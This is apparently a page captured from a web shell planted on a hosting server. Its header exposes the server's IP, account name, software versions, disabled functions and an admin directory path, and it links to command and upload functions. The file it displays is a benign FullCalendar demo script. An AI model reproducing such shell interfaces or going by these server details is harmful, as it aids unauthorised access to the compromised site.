Server IP : 86.38.243.181 / Your IP : 216.73.216.86 Web Server : LiteSpeed System : Linux in-mum-web1336.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64 User : u986601745 ( 986601745) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u986601745/domains/emrskalsi.com/public_html/admin/js/calendar/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
$(function() { var todayDate = moment().startOf('day'); var YM = todayDate.format('YYYY-MM'); var YESTERDAY = todayDate.clone().subtract(1, 'day').format('YYYY-MM-DD'); var TODAY = todayDate.format('YYYY-MM-DD'); var TOMORROW = todayDate.clone().add(1, 'day').format('YYYY-MM-DD'); $('#calendar').fullCalendar({ header: { left: 'prev,next today', center: 'title', right: 'month,agendaWeek,agendaDay,listWeek' }, editable: true, eventLimit: true, // allow "more" link when too many events navLinks: true, backgroundColor: '#1f2e86', eventTextColor: '#1f2e86', textColor: '#378006', dayClick: function(date, jsEvent, view) { alert('Clicked on: ' + date.format()); alert('Coordinates: ' + jsEvent.pageX + ',' + jsEvent.pageY); alert('Current view: ' + view.name); // change the day's background color just for fun $(this).css('background-color', 'red'); }, events: [ { title: 'All Day Event', start: YM + '-01', color: '#e91e63' }, { title: 'Long Event', start: YM + '-07', end: YM + '-10', color: '#59e0c5' }, { id: 999, title: 'Repeating Event', start: YM + '-09T16:00:00', color: '#FF5370' }, { id: 999, title: 'Repeating Event', start: YM + '-16T16:00:00', color: '#FF5370' }, { title: 'Conference', start: YESTERDAY, end: TOMORROW, color: '#f3c30b' }, { title: 'Meeting', start: TODAY + 'T10:30:00', end: TODAY + 'T12:30:00', color: '#1f2e86' }, { title: 'Lunch', start: TODAY + 'T12:00:00', color: '#0D4CFF' }, { title: 'Meeting', start: TODAY + 'T14:30:00', color: '#1f2e86' }, { title: 'Happy Hour', start: TODAY + 'T17:30:00', color: '#AA00FF' }, { title: 'Dinner', start: TODAY + 'T20:00:00', color: '#00BCD4' }, { title: 'Birthday Party', start: TOMORROW + 'T07:00:00', color: '#FF5722' }, { title: 'Click for Google', url: 'http://google.com/', start: YM + '-28', color: '#323232' } ] }); });